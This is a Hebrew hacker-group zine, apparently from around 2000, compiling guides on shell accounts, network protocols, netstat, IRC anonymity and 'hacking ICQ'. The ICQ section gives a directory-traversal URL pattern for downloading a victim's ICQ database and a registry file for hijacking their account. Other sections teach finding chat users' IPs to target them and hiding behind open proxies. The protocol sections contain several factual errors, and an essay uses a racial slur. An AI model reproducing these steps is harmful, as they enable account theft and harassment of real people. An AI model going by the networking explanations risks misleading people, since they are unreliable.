שאלל הוא בעצם מערכת יוניקס\לינוקס מרוחקת...ולפעמים אתה שולט על כל המחשב המרוחק דרך המחשב הביתי שלך אפילו אם יש לך וינדוס 98, או כל דבר אחר...

דרך השאלל אפשר לגלוש באינטרנט, להתקין שרתי צ'אט FTP, וכל דבר אחר שבא לכם לראש...אבל בדרך כלל השרתים הרגילים מאפשרים להריץ עד 3 שרתים בו זמנית.

 

לשם מה הוא נועד?

================

חשבון השאלל נועד להרבה מטרות חשובות וחשובות פחות, אבל הוא מיועד בעיקר לאנשים שאין להם לינוקס, אבל הם בכל זאת רוצים להשתמש בשירותים שהלינוקס מקנה להם, בלי להתקין אותו במחשב שלכם.

עוד השאלל משמש ללימוד, צבירת ניסיון בלינוקס -כי כל הפקודות בו נכתבות ידנית כי אין לכם בשאלל שום מסך גראפי כמו בוינדוס, והוא איכשהו מזכיר את מערכת ה-דוס.

עוד שימוש עיקרי בשאלל הוא כמובן פריצה...למרות שזה ממש לא חוקי ויכול לסבך אותכם בגדול, כי כל האחריות נופלת על בעל השאלל, זה בכל זאת אפשרי ורב כוח!!

רוב שרתי השאלל פועלים על פס תקשורת מהיר מאוד, כשבממוצע הוא פועל על מערכות T3 ואף מגיע להתקנים כמו  OC48 -שבמילים פשוטות מי שלא יודע מה זה, המכשיר מגיע למהירות של יותר מחמש ג'יגה-בייט לשניה!!

-בשאלל אתם יכולים להתקין שרתים מגוונים, והכל באיכות שרק מערכת יוניקס יכולה לקנות לכם...ושלא נדבר על המהירות שאיתה אתם עובדים. לעומת זאת, בשאללים שניתנים חינם, האפשרויות מאוד מוגבלות ולא נותנות לכם להריץ בוטים לצ'אטים או שרתים שתופסים הרבה זיכרון ועוד הרבה הגבלות אחרות, כך שאם אתם באמת מחליטים להתנסות בשאלל, בלי הפחד של להרוס לעצמכם את המחשב אם תתקינו לינוקס, עדיף יהיה לכם לשלם 8 עד 20 דולרים לחשבון שאלל מתקדם, שייאפשר לכם לעשות בו כמעט כל דבר אפשרי בדיוק כמו במערכת יוניקס רגילה!

 

פקודות בסיסיות בשאלל

====================

טוב, לאלו שלא יודעים דבר ביוניקס\לינוקס [אותו הדבר], ניתן כמה פקודות בסיסיות לשימוש בשאלל שלכם..כי הפקודות שונות מאלו שאתם מכירים...

הערה:

=====

במערכות יוניקס יש הבדל בין אותיות גדולות לקטנות, ככה שתקדישו לזה תשומת לב!

 

Cd   להיכנס לספרייה שאתם רוצים...בדיוק אותה הפקודה המוכרת ממערכת הדוס -.

cat שנותן לכם לראות את תוכן הקובץ אותו אתם כותבים לצפייה. -

Wget -   פקודה האומרת לתוכנה להוריד את הקובץ מהלינק אותו תכתבו לידה.

lynx זוהי =תוכנה= אמיתית, כמובן בלי שום גראפיקה, ככה שאל תבהלו, אבל זהו דפדפן -  האינטרנט המהיר ביותר בעולם....כי הוא פותח אתרים בצורה טקסטואלית!

Emacs-  - שוב =תוכנה= שנותנת לכם לערוך קבצי טקסט, לתכנת!, ועוד הרבה אפשרויות אחרות!

Gzip -  - פקודה לפתיחת קובץ מכווץ שאתם מורידים מהאינטרנט מסוג .gz

Tar - tar - זהו עוד כיווץ שבא בדרך כלל בייחד עם ה -GZIP והוא פותח קבצים מכווצים מסוג .

dir  פקודה מוכרת לכולנו...אין צורך לפרט אני חושב  -

Gcc -  C\C++ הקומפיילר לשפת ה   שאי אפשר לזוז בלעדיו כמעט בלינוקס...

עוד חשוב לציין, שאפשר לראות את העזרה לפקודות\תוכנות המבוקשות בעזרת פקודת:

help--Command

עם רווח בין שני הפקודות!

אם אתם רוצים לקרוא יותר לעומק את הפקודות או כל דבר אחר לתפעול הלינוקס, השתמשו בפקודת:

man

וליידה את הפקודה\תוכנה\כל דבר אחר שעליו אתם רוצים לקרוא עוד.

 

טוב, עכשיו אתם בטח רוצים כמה כתובת מאיפה אפשר להשיג שאללים, אז הנה, ניתן לכם כמה כתובת של שאללים חינמים שלא מומלצים כל-כך, אבל בכל זאת...

nether.net

freeshell.org

www.cyberarmy.com/lists -אני לא יודע אם עדיין יש שם רשימות של שאאללים, אבל בכל זאת תנסו!

 

שאללים בתשלום אפשר למצוא דרך שרתי הצ'אט של EFNET, DALNET

בחדרים: #SHELLS, SHELL,BOUNCERS

שנותנים לכם המון מקומות לקניית שאללים טובים!

 

אם אתם בכל זאת לא יודעים איך להתחבר לשאלל שלכם, אז הנה:

telnet yourshellhere   - בפורט 23

BY CnTaX

פרוטוקולים.

 

קודם כל נתחיל אם סוגי הפרוטוקולים הקיימים ומה הם עושים.

 

הערה קטנה לפני שנתחיל, שני סוגי הרשתות הקיימות.

LAN - רשת מקומית

WAN - רשת שמשתרעת על יותר מ12 מחשבים באותו חדר.

 

כל הפרוטוקולים מתחלקים לשני סוגים.

1.      Connectionless protocol – הוא פרוטוקול אשר שולח הודעה/מידע או כל דבר אחר ללא המתנה לאישור מהנמען. ככה הפרוטוקול עובד מהר יותר והוא גמיש יותר.

2.      Connection oriented protocol –  הוא פרוטוקול אשר שולח הודעה/מידע למחשב אחר והוא ממתין לאישור הנמען, הפרוטוקול הנ"ל מאובטח ביותר והעברת הנתונים תהיה איטית יותר בגלל ההמתנה לתשובה.

 

עכשיו נעבור לעבודת הפרוטוקולים תחת המודלים של ה OSI.

IPS

 

 

OSI

Not Specified

Application

ARP, RARP

Presentation

IP

Session

TCP, UDP

Transport

Telnet, FTP, SMTP, SNMP, HTTP

Network, Data Link, Physical

 

יש פרוטוקול אשר יוצא דופן מהשאר.. בגלל שהוא עובד על המרת תווים למספרים.

ARP – Address Resolution Protocol.

ויש אחד אשר עובד על העברת חדשות , אבל הוא לא ממש מעניין.

NNTP – Network News Transport Protocol.

 

 

פה אני אתן רשימה של פרוטוקולים שלא נמצאים בשימוש ע"י כל אחד, אבל שימושיים לאלה שעובדים איתם.

מה הוא עושה ?

שם הפרוטוקול !

משמש לבקרת שגיאות

ICMP – Internet Control Message Protocol

הקצאת IP באופן ידני לרשת


DHCP – Dynamic Host Configuration Protocol

קביעת וקטור המסלולים ב TCP/IP

RIP – Routing Information Protocol

משמש כ Redirector

SMB – Server Message Box

משמש ל-קלט/פלט של שמות (IP)

NetBios – Working under Session

כמו NetBios רק שזה לא תומך ב

Routing Message

NetBEUI – Working under Transport

מערכת לתרגום שמות ל- IP.

Wins - Windows Internet Naming Service

 

 

 

 

 

עכשיו נעבור לפרוטוקולים הנפוצים יותר והשימושיים יותר.

 

מה הוא עושה ?

שם הפרוטוקול !

קשר מנקודה לנקודה.

 

PPP – Point to Point Protocol

עושה פעולה אחת לפני ה PPP

SLIP – Serial Line Internet Protocol

-"- -"- -"-"- ה PPP, רק בצורה דחוסה.

CSLIP – compress Serial Line Internet Protocol

הורדת קבצים והעלאת קבצים. (Transport)

FTP – File Transfer Protocol

פרוטוקול לעבודה בין מסופים.

Telnet – Terminal Networking

פרוטוקול לדואר נכנס/יוצא.

SMTP – Simple Mail Transfer Protocol

פרוטוקול לאינטרנט היפר-טקסט. אתרים וכו'

HTTP – Hypertext Transfer Protocol

פרוטוקול לניהול פשוט של הרשת.

SNMP – Simple Network Management Protocol

עוזר להעברת חבילות גדולות של מידע.

UDP – User Datagram Protocol

משמש להעברת/קבלת .נתונים.

TCP – Transmission Control Protocol

משמש לתקשורת לאינטרנט.

IP – Internet Protocol

חבילת פרוטוקולים נפוצה אשר משמשת כדי לגלוש לרשת האינטרנט.

TCP / IP - Transmission Control

                  Protocol/Internet Protocol

ישנו כמו מין דבר מעיק כזה, שאני לא יודע אם לקרוא לזה באג בפרוטוקול הנפוץ ביותר בעולם.

ה- TCP/IP, כאשר אתה משתמש בפרוטוקול לשליחת מידע אז, בכל פעם שאתה שולח מידע בחבילה אז אתה גם מוריד חבילה באותו זמן, בלי ידיעתך. אז זה מקשה משפיע על קצב העברת הנתונים ממך אל נמען אחר.

הפרוטוקול הנ"ל אינו מסוגל לקרוא אותיות, רק ספרות [מספרים], כגון (203.201.023.0)(כתובות IP), אז בכל מחשב שמשתמש בפרוטוקול זה ישנו גם פרוטוקול שאחראי על המרת האותיות למספרים. הוא נקרא:

ARP – Address Resolution Protocol.

 

כל תהליך ההמרה מתחיל ככה:

1.      NetBios Cache, 2.Wins, 3.BroadCast, 4.Lmhost file, 5.Host file, 6. DNS.

2        דוגמא:

·        BiosCache =  [www.walla.co.il] – הוא קולט את האותיות ומתחיל בהמרה

·        Wins – המנגנון הממיר את האותיות למספרים, הוא מתחיל בפענוח האותיות.

·        BroadCast – שידור של אות.

·        Lmhost File – ממיר אותיות למספרים ולהיפך. במקרה שלנו מאותיות למספרים.

·        Host File –  קובץ מארח ע"פי הנתונים של ה קובץ מעל.

·        DNS =  [192.118.70.2] – הפלט של ההמרה

 

ככה עובד הפרוטוקול הידוע והנפוץ TCP/IP.

-----------------------------------------------------------------------------------------------

נעבור לשני הגדרות שהם קצת יותר מתקדמות בעבודה ברשת.

ODI – Open Datalink Interface & Open Device Interconnect.

 

NDIS – NetWork Driver/Device InterFace Specification.

ODI – צורת הצגה של העברת נתונים פתוחים.

NDIS – ממשק למנהלי רשת בסביבת חלונות.

 

By Pirsing

מבוא לשכבת OSI

 

ה-OSI הוצא לאור ב 1978 ע"י ה-ISO ( ארגון התקנים הבינלאומי)

ה-OSI מגדיר את פונקציות התקשורת בין מחשבים במונחים של שבע שכבות.

הרעיון של OSI הוא שמערכות שונות יוכלו לתקשר ביניהן בעזרת פרוטוקולים וממשקים ששתי המערכות מבינות.

 

כשארגון התקנים הבינלאומי יצר את ה-OSI הוא חילק את פונקציות הרשתות לשבעה שכבות והן:

                         

                         ______________

                        | Application  |     

                        |______________|       

                        | Presentation |       

                        |______________|        

                        |   Session    |     

                        |______________|    

                        |   Transport  |

                        |______________|

                        |   Network    |     

                        |______________|        

                        |  Data Link   |         

                        |______________|      

                        |   Physical   |     

                        |______________|

 

 

עכשיו אני אסביר על כל שכבה.

 

* שכבת Physical

  השכבה הזאת היא בעצם הדברים הפיזיים, שאפשר לגעת בהם כגון כבלים היא גם מגדירה כל מיני דברים

  כמו פינים בכבלים.

 

* שכבת Data Link

  שכבה זו מספקת העברת נתונים מנקודה לנקודה השכבה גם מספקת טיפול בבעיות בהעברת הנתונים.

 

* שכבת Network

  השכבה הזאת מאפשרת העברת נתונים בין השכבות, השכבה הזאת יכולה לנווט ולשלוט בחבילות.

  יש עוד תפקיד לשכבה שהוא לתת כתובת לחבילות שנוצרו ע"י השכבה Transport שנסביר עליה תיכף אתם

  כבר תבינו למה היא נותנת להם כתובת.

 

* שכבת Transport

  נגיד שאתה רוצה לשלוח מכתב לשרת מסויים אבל הוא שני דפים אז אתה שולח אותו בשני חבילות,

  השכבה הזאת ממספרת את החבילות מצד השולח והוא בודק שהם מסודרות לפי סדר השליחה לפני שהוא מרכיב

  הכל לדבר אחד.

 

* שכבת Session

  כששני יישומים ברשת מתקשרים זה עם זה תפקיד השכבה הוא לקבוע איזה יישום מדבר ואיזה ישיב,

  השכבה גם מפקחת על כל מיני דברים אחרים למשל שפתאום החיבור לאינטרנט התנתק אז השכבה הזאת היא

  זאתי שמתריעה אותך שהחיבור לאינטרנט התנתק.

 

* שכבת Presentation

  השכבה הזו בעצם מכינה את ההודעות לשידור, היא משמשת גם להצפנה וגם לדחיסת נתונים כדי שהעברה

  תהיה מהירה יותר.

 

* שכבת Application

  זוהי השכבה שבה אתה מבקש מה לעשות ומערכת ההפעלה עושה את זה, כמו להוריד נתונים ממחשב אחר

  או כל דבר אחר, השכבה שולחת את הבקשה לשכבת Transport ומשם זה ממשיך.

 

כל שבעת השכבות מחולקות לעוד שלושה חלקים:

 

שכבות ה-Physical, Data Link, Network נקראות Communication Subnet              

 

השכבות ה-Session, Presentation, Application נקראות Host Process

 

ההשכבה האמצעית Transport משמשת כחוצץ בין שני החלקים האחרים.

 

 

OSI model and internet

 

 

             Application , Presentation , Session

                                ||                                   

                                ||

                            NFS, XDR, RPC,

                            TELNET, FTP,

                            SMTP, RIP.

        

                            Transport

                               ||

                               ||

                            TCP, UDP

 

                  Network , Data Link , Physical

                               ||

                               ||

                            IP, ICMP

                            802.2

                            802.3 CSMA/CD

                            802.4 Token Bus

                            802.5 Token Ring

 

OSI model and Novell NetWare

           

 

             Application , Presentation , Session

                                ||

                                ||

                            NCP, NETBIOS

                            Emulation,

                            NETX, Btrieve,

                            NetWare, RPC,

                            STREAMS, TLI,

                            SAP

 

                            Transport

                               ||

                               ||

                            SPX, IPX

 

                  Network , Data Link , Physical

                               ||

                               ||

                            802.2

                            802.3 CSMA/CD

                            802.4 Token Bus

                            802.5 Token Ring

 

By [Twix]


 

 

תרבות ההאקרים

 

הקדמה

בטקסט זה נספר קצת על התרבות של ההאקרים של ימינו, נגדיר את סוגם ונאפיין כל אחד ואחד מהם.

הטקסט אמור להבהיר את עמדתם של ההאקרים בפריצה לאתר או לשרת שהם בוחרים ואת הסיבות.

 

 

אתם בטח שואלים את עצמכם, מה לעזאזל אני רוצה מכם ולמה אני בכלל מוציא את החרבון הזה לאור?

הסיבה פשוטה...כי אני פדופיל משועמם ואין לי מה לעשות בחיים חוץ מלמשש את כפתורי המחשב.

ועכשיו ברצינות, נתחיל!

 

רוב ההאקרים, אפילו בלי ידיעתם של רבים מהם, לא יודעים למה הם פורצים בשיטה אחת או אחרת, ולמה הם עושים נזק בלתי הפיך או נזק מזערי...אבל אנחנו ננסה להגדיר אותם במקומם.

אני בטוח שלא פעם ולא פעמיים נפגשתם באתר שנפרץ, ורואים שכל לינק שאתם מנסים להתחבר אליו דרך השרת, מת.

הסיבה לזה פשוטה, ההאקר שלנו, מחק לא רק את כל העקיבות של הרשומות שעוקבות אחריו [LOGS] אלא גם את כל תוכן האתר\השרת.

ולמה הוא עשה את זה? -גם כאן הסיבה בדרך כלל אחידה, פריצה מסוג זה באה בדרך כלל מסיבות גזעניות, מה שבתקופה האחרונה אנחנו נתקלים בו הרבה למדיי...אז הבנאדם מחליט שמאכסן השרת הזה חייב למות ושייקלוט את המסר שהוא לא רצוי פה...

עוד סיבה לפריצה מסוג זה, באה בגלל שהבנאדם רוצה להשוויץ שהוא גורו [מין אליל] ושאף אחד לא מסוגל עליו, בגלל שהוא מחק מהייקום איזה שרת ערבי מסכן, שלמנהל שלו אין במילא ממה להתפרנס, אז הוא אפילו לא מאבטח אותו כמו שצריך...אז ממה כבר יש לו להתלהב? -אז הוא הריץ באג..אז הוא השתלט על השרת..מרגיש גבר אה?

אז שתדעו, שרוב ההאקרים הם לא כאלה, והם לא פועלים סתם בגלל דחפים לאומיים וכיוצא בהם.

אז מה בעצם המטרה של ה-"האקר הלוחם" שלנו בפריצה?

המטרה היא להעביר מסר או נקמה, [בדרך כלל תוקעים איזה דגל ישראל ברקע].

הפריצה באה במטרה להרוס את היריב ולא שום דבר מעבר לכך...או בגלל שהבנאדם רק חזר מאיזה דיסקוטק ביום שישי ואמא כבר במיטה עם המאהב, אז אין מה לעשות ואין כוח לישון...[והסיבה הזאת מוצדקת].

 

עכשיו נגלה את הצד של ה-"האקר החיובי":

ההאקר החיובי, הוא בעצם האקר\מאבטח, שהמטרה שלו בפריצה היא בדרך כלל להזהיר את מנהל השרתים מאיזה באג באחת התוכנות\שרתים שמותקנים על השרת שלו.

כך מנהל השרת ייתקן את הבאג ושני הצדדים יהיו מבסוטים ואפילו לפעמים הפורץ ייקבל איזושהי תמורה למעשה!

- התנאי הוא, שהפורץ החכם שלנו, לא יימחק את דף המקור, אלא רק יישנה את שמו, ואת הדף אותו הוא רוצה לעלות במקום, הוא יישנה לשם של דף האינדקס לדוגמא: http://www.tuvia-the-kli.com/index.html

והאתר ייעלה תחת הקובץ שאותו שם הפורץ, שם הוא יכול לכתוב מה שבא לו...אבל הפורץ המתורבת, ישים רק אזהרה למנהל השרת, ויציין את תיבת הדואר האלקטרוני שלו, ואת שם הקובץ אותו הוא שינה.

אתם בטח שואלים את עצמכם:"אבל מושיקו הוא כושון נחמד, למה לשרוף אותו?" -נו טוב...זה מה שאני הייתי שואל את עצמי, אבל נתעלם מזה.

השאלה שתצוץ בראש היא, מה ייצא לי מזה בכלל?!?!

התשובה פשוטה: אתה תיחשב בתור האקר עם כבוד, ולא סתם אחד שאין לו חיים, אז הוא מוחק אתרים...והרבה פעמים, מנהל השרת גם יימליץ עליכם לאחרים, וככה אולי אפילו תזכו להרבה צ'ופרים ואולי אפילו עבודה!

בזמן האחרון, ההאקר החיובי תופס תאוצה ברשת, כי רוב ההאקרים מבינים שאם הם ימשיכו בדרך השלילית...זה יוביל אותם לקינוס המחשב שלהם, ואולי אפילו לתיקים פליליים...אז בשביל מה כל הבלאגן?

 

חשוב לזכור:

לא תמיד מנהל השרת יחשיב את הפריצה שלכם כמשהו חיובי, ובכל רגע הוא יכול להסתכל על הלוגים שלנו [רשומות] אלא אם לא מחקתם אותם, ופשוט לדווח עליכם למשטרה או לספק האינטרנט שלכם -שבשמחה יירצה לקחת ממכם את חשבון האינטרננט שלכם אפילו אם הוא מרוויח מזה...

 

מסקנה:

אם אתם בוחרים ללכת על האקינג, תחשבו טוב טוב איזה סוג של "פרצנים" אתם רוצים להיות...תחשבו אם בכלל כדאי לכם להיכנס לעסק המלוכלך, ואם כן, אז שתדעו טוב יותר את הדברים שלפניכם...

 

By CnTaX

 

 

מידע על IP וערוצים(Ports) על-ידיי פקודת netstat

 

 

תוכן עניינים:

 

מבוא

א. שימוש ב-NETSTAT

ב. פענוח ערוצים פתוחים

ג. שימוש ב-NETSTAT לגילוי מספרי IP של משתמשי תוכנת ICQ

ד. שימושים נוספים

ה. כלים ועזרים

ו. טיפים שימושיים

ז. סיכום

 

מבוא

אתם קוראים מדריך של ארגון ההאקרים הישראלי, אנא התעלמו משגיאות כתיב.

אני מקווה שתרכשו יידע מעמיק יותר מקריאת טקסט זה, והעיקר הוא שתהנו מקריאתכם!

אני מציע שתדפיסו את הטקסט בכדיי שיהיה לכם נוח יותר לקרוא אותו.

קריאה מהנה, CNTAX.

 

א. שימוש ב-NETSTAT

-הפעלת התוכנה:

לחצו על [START](התחל בגירסא העברית) [PROGRAMS](תוכנות או עזרים) [MS-DOS PROMPT].

NETSTAT היא תוכנה מאוד שימושית שמתאימה להרבה משימות. אני אישית משתמש בתוכנה בכדיי להשיג מספרי IP של אנשים שאני מדבר איתם ב-ICQ. כמו כן אפשר להשתמש ב-NETSTAT על מנת לאתר פריצות של סוסים טרויאנים(TROJANS) במחשבכם או סתם בכדיי לראות את תנועת הערוצים.

הסתכלו על הדוגמא שלפניכם של הפלט שנותנת התוכנה בעת הקשת: NETSTAT בשורה: c:\windows בחלון MS-DOS PROMPT.

 

                                                                           C:\WINDOWS>netstat          

 

                                                                           Active Connections   

                                 Proto  Local Address          Foreign Address        State

                           TCP    pavilion:25872         WARLOCK:1045           ESTABLISHED 

                   TCP    pavilion:25872         sy-as-09-112.free.net.au:3925  ESTABLISHED

                           TCP    pavilion:31580         WARLOCK:1046           ESTABLISHED

                           TCP    pavilion:2980          205.188.2.9:5190       ESTABLISHED

              TCP    pavilion:3039          24.66.10.101.on.wave.home.com:1031  ESTABLISHED

 

עכשיו בואו נסתכל על הדוגמא. אתם רואים [PROTO] בצדו השמאלי של המסך.

אחריו תראו [Foreign Address] שורה זו תתן לנו את מספר ה-IP או/ו שם השרת של המשתמש ואת הערוץ(PORT) עליו הוא נמצא בצורה הבאה: IP:Port עם ":" בין מספר ה-IP לערוץ.

ובסוף תמצאו את המילה [STATE](מצב) מה שפשוט מראה את מצב הערוץ(PORT).

חלק זה יכול להיות במצב-ESTABLISHED במצב מחובר או-WAITING CONNECT אם אם הוא במצב האזנה(למידע).

עכשיו עם יידע זה אנחנו עוברים לשלב מתקדם יותר על איך להשתמש בתוכנה בכדיי לפענח ערוצים פתוחים.

 

ב. פענוח ערוצים פתוחים

 

קרה לכם שמשהו מוזר קורה למחשב שלכם? הסי.די-רום נפתח בעצמו? המסך נכבה בלי שכיביתם אותו? ואתם שואלים את עצמכם מה לעזאזל קורה פה?...ולפתע מבינים שמישהו פורץ לכם למחשב בעזרת טרויאן(TROJAN).

אז עכשיו המשימה שלכם היא לבדוק איזה טרויאן שלחו לכם ולהשמיד אותו נכון? ובכן אתם צודקים.

אז לכו שוב ל-MS-DOS PROMPT. עכשיו יש לנו הרבה אפשרויות שאפשר להשתמש בהם דרך NETSTAT אז  אתם יכולים לכתוב כך על מנת לקבל את תפריט העזרה של NETSTAT:

c:\windows>netstat help

(אולי אני אכתוב תוסף שיופיע בו התפריט במצב מתורגם)

תעיינו בתפריט ותחזרו לכאן...

קראתם?...אז בואו נמשיך...

אני אישית אוהב את הפקודה (c:\windows\netstat -an)  שמראה את כל הערוצים(PORTS) הפתוחים ואת כל החיבורים בצירוף כתובת ה-IP במקום שם השרת(HOSTNAME).

עכשיו כשאתם יודעים לבדוק את החיבורים, אתם יכולים לחפש ערוצים של טרויאנים כמו 12345(NETBUS הישן) כמו 1243(SUB SEVEN) וכו'.

עכשיו כל מה שלמדתם יהיה מאוד שימושי לכל הצרכים שלכם שמייד תגלו, אבל קודם לכו תעשו הפסקה קטנה כדיי שכל המידע שקיבלתם עד עכשיו ייספג לכם טוב טוב למוח ותחזרו לפה מוכנים ללמוד עוד!

 

ג. שימוש ב-NETSTAT לגילוי מספרי IP של משתמשי תוכנת ICQ

 

האם אי-פעם רציתם להשיג את ה-IP של מישהו שעיצבן אותכם ב-ICQ אבל הוא היה מוסתר או שפשוט לא הופיע? אני מתאר לעצמי שכן...אז בואו נלמד שיטה שתעזור לנו למצוא IP של אנשים שמחוברים ל-ICQ שלנו.

גילוי מספר IP של משתמש ICQ דרך NETSTAT -

בכדיי להשיג מספר IP של המשתמש, עליכם לפתוח את ה-MS-DOS PROMPT ולעשות  netstat -n (בכדיי לראות את כל רשימת הפורטים הפתוחים) לפני שהתחלתם לדבר איתו ב-ICQ, רשמו את המספרים על דף או מסמך.

עכשיו הגיע הזמן לגלות את מספר ה-IP שלו. שלחו למשתמש הודעה עכשיו עשו במהירות netstat -n

ותתווסף לכם שורה חדשה של מספר IP, עכשיו גלו בעזרת הרשימה שעשיתם את המספר החדש, עכשיו יש לכם את המספר של המשתש בלי להשתמש בכל מיני פריצות ופאצ'ים(שלא תמיד עובדים) עכשיו אחרי לכדתם את המספר שלו אתם יכולים לעשות איתו מה שבא לכם! כיף לא?

 

ד. שימושים נוספים

 

ב-NETSTAT אפשר להשתמש להשגת IP של כל דבר וכל אחד, כל עוד יש חיבור ישיר בין שני הכיוונים(בינך לבין התוכנה או בין המשתמש השני) לדוגמא:העברת קבצים, הודעות ישירות, צ'אט של ICQ, במירק(MIRC) ועוד...

 

 

ד. כלים ועזרים

סריקת ערוצים: בכדיי לבדוק ערוצים(PORTS) פתוחים במחשב(לא שלכם :))

 [seventh sphere port scanner] - שני אתרים למקרה שאחד האתרים נפל

http://members.xoom.com/Cryptog/7spereportscan.exe

http://members.xoom.com/gohan_3/7spereportscan.exe

[Lockdown 2000] - תוכנה למניעת פריצות למחשב האישי

http://www.lockdown.com

[ICQ] - למי שעדיין אין לו(למרות שלא נראה לי שיש מישהו כזה..)

http://web.icq.com

 

ה. טיפים שימושיים

 

א. לפעמים NETSTAT פולט רשימות ארוכות מאוד מה שעלול להקשות ולבלבל משתמש מתחיל. אם אתם מתקשים, פשוט תריצו את NETSTAT ללא שום פקודות ותיצרו קשר עם המשתמש השני(על ידיי שליחת/קבלת הודעה מהמשתמש השני) ואז תריצו את NETSTAT שנית. צריכה להופיע שורה חדשה - זה מה שאתם מחפשים!

ב. יבוא בגירסא הבאה...

 

 

ו. לסיכום

 

אני מאוד מקווה שהמדריך העניק לכם יידע ושמעכשיו תתחילו להתנסות בדרכים מקצועיות יותר כמו זו.

אני מבטיח שעוד הרבה מאוד מדריכים יגיעו בהמשך ויילוו אתכם לאורך כל הדרך, עד שתהייו איינשטיינים קטנים! טוב...אולי הגזמתי :) אז בקיצור תכנסו לאתר שלנו בכדיי להתעדכן בעולם ההאקרים וכל העולם התחתון!

 

By Tricker

תורגם ע"י CnTax

אנונימיות ב- irc

 

 

שלום לכולם במדריך זה אני יראה לכם כמה שיטות איך להיות אנונימי ב-irc כתבתי את המדריך הזה מכיוון

שכל הזמן שואלים אותי איך להסתיר את האי פי שלי אז תקראו ותבינו אז יאללה נתחיל

 

שיטה -1:

 

במירק ישנה אפשרות לשרתים שתומכים בזה להסתרת האיי פי וזה הולך ככה

'mode yournick +x/' (בלי הגרשים)

זה אומר לשרת irc אם הוא תומך בזה להסתיר את האיי פי אם מישהו עושה עליך whois

 

שיטה-2 דרך wingate הדרך הקלה

 

כל מה שאתה צריך לעשות בשיטה הזאת זה ללכת ל:

file --> option --> firewall

ולסמן את האפשרות

USE SOCKS firewall

ולהכניס שרת wingete בפורט 1080

 

שיטה-3 דרך wingate הדרך הקשה

 

תכנס את הפקודה הבא כאשר את במצב offline

server wingate-ip:[port 23] ie /server xxx.xxx.xxx(IP Address) 23/

עכשיו אתה מחובר ל wingate

 עכשיו להתחבר לשרת מירק שאתה רוצה תכניס את השורה הבא

quote irc.server.com 6667/

 

את הצעד הבא תצטרך לבצע מהר לפני שתקבל פינג תכניס את השורות הבאות

quote user god bikkel snikkel urnick/

quote nick urnick/

 

אם יש לכם תגובות או בקשות שלחו לי איי מיל

[email protected]

 

By VB-Man

 

פריצה לאי.סי.קיו

 

קובץ הסבר על להשיג סיסמאות של משתמשים אחרים & להתלבש על המספר שלהם(בלי הסיסמא).

הרבה אנשים רצו לדעת איך לעשות את זה וזה ממש קל (למי שחשב שזה קשה).

אבל יש בעיה קטנה קטנה - זה לא תמיד עובד, אז עם לא עובד לכם אל תבואו בטענות.

קודם - תוודאו שאתם יודעים את הדברים הבאים:

& שהוא הוריד את גירסא 99 והוא לא נגע בהגדרות שהאיסיקיו שם לא לאחר ההתקנה.

אני יודע שזה קצת מעיק אבל אין מה לעשות, לא אני כתבתי את האיסיקיו אז מצטער.

זה טוב לעבוד על ליימרים או אנשים שאתם יודעים מה קורה אצלהם במחשב.

& איפי של המשתמש שאתם רוצים לגלות את סיסמתו.

& מספר האי סי קיו של המשתמש שאתם רוצים לגלות את סיסמתו.

1. הורידו את הקבצים הבאים

http://123.123.123.123/.html/....../db/UIN.idx

http://123.123.123.123/.html/....../db/UIN.dat

http://123.123.123.123/.html/....../db/UINmsg.dat

http://123.123.123.123/.html/....../db/UINmsg.idx

http://123.123.123.123/.html/....../db/UINhis.idx

http://123.123.123.123/.html/....../db/UINhis.dat

*את ה - 123.123.123.123 החליפו במספר האיפי של הקורבן ובמקוםה - UIN שימו את המספר שלו.

**יש שש נקודות באמצע השורה, לא שמונה(הם השורות לגישה של התיקיה של האיסיוקיו של הקורבן).

כאן יש להשתמש באקספוילט אחר אשר לא בגכל הפעמים זקוקים לו.

2.פתחו קובץ טקסט חדש והעתיקו את השורות הבאות לשם:

*** לזכור : להחליף את המילה HACKEDUIN למספר של הקורבן שלכם.

 

 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN]"Name"="Hacked UIN"

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs]

"Random Groups Version"=dword:0000000a"Online Color"=dword:00ff0000

"Unlisted Color"=dword:00800000"Offline Color"=dword:000000ff

"Authorize Color"=dword:00400080"Notify Color"=dword:00800080

"LastStatus Color"=dword:00008000

"Default File Dir"="C:\\Program Files\\ICQ\\Received Files""SMTP Address"=""

"DND Message"="Please do not disturb me now. Disturb me later.""Out Message"=""

"Busy Message"="User is occupied. Only urgent messages will be delivered."

"Chat Message"="I would like to chat about anything""Away PreNum"=dword:00000000

"Out PreNum"=dword:00000000"Busy PreNum"=dword:00000000

"DND PreNum"=dword:00000000"Chat PreNum"=dword:00000000

"File Options"=dword:00000004"URL Options"=dword:00000004

"Chat Options"=dword:00000004"All Options"=dword:0000000e

"EXT Options"=dword:00000004"Startup"="No""Auto Away"="No"

"Auto Hide Time"=dword:0000001e"Auto Hide"="No""Move Server Top"="No"

"Blink In Tray"="No""Sort Lists"="Yes""Show Online List"="No"

"Remove AddFriend"="Yes""Splash Open"="Yes""History Last First"="Yes"

"FloatTop"="Yes""Thru Server"="No""Join Chat"="No""Open URL Browser"="No"

"Refuse File NotInList"="No""Overwrite ExistFile"="No"

"Disable Online Alert"="Yes""Accept Urgent In Busy"="No"

"Blink Tray In AwayBusy"="Yes""Use Contact List Color"="No"

"Contact List Color"=dword:00c8b99d"Save User File"="Yes""Auto Update"="Yes"

"Search Wizard"="No""Default Mailer"="Yes""Pop Play Sound"="Yes"

"Pop Auto Launch"="No""Pop Check"="No""Pop Time"=dword:0000000a

"Check Headers"="Yes""MoveToOutDelay"=dword:00000014"MoveToOut"="No"

"MoveToAwayDelay"=dword:0000000a"MoveToAway"="No""Auto Sleep Mode"="No"

"Log History Events"="Yes""Connection Type"="Permanent""Firewall"="Yes"

"UseGivenIP"="No""Socks"="No""SocksPort"=dword:00000438

"SocksServer"="Enter your socks server"

"ProxySocks4Host"="Enter your proxy server""ProxySocks4Port"=dword:00000438

"UseProxySocks4"="No""GiveStats"="No""SocksVersion"=dword:00000004

"SocksAuthentication"=dword:00000000"FirewallTimeout"=dword:0000001e

"UseFirewallTimeout"="No""UseFirewallRangePorts"="Yes"

"FirewallFromPort"=dword:000059d8"FirewallToPort"=dword:00007148

"Old Sockets"="No""UserType"=dword:00000000"Mail Receipients"=";"

"Random Available"="No""RandomGroupName"=dword:00000001

"Random Name"="#¥d¶³ 666 £[""Allow Secure Clients Only"="Yes"

"PhoneApproval"="Yes""PhoneToneTime"=dword:00000032

"PhonePauseTime"=dword:000001f4"PhoneBreakTime"=dword:00000028

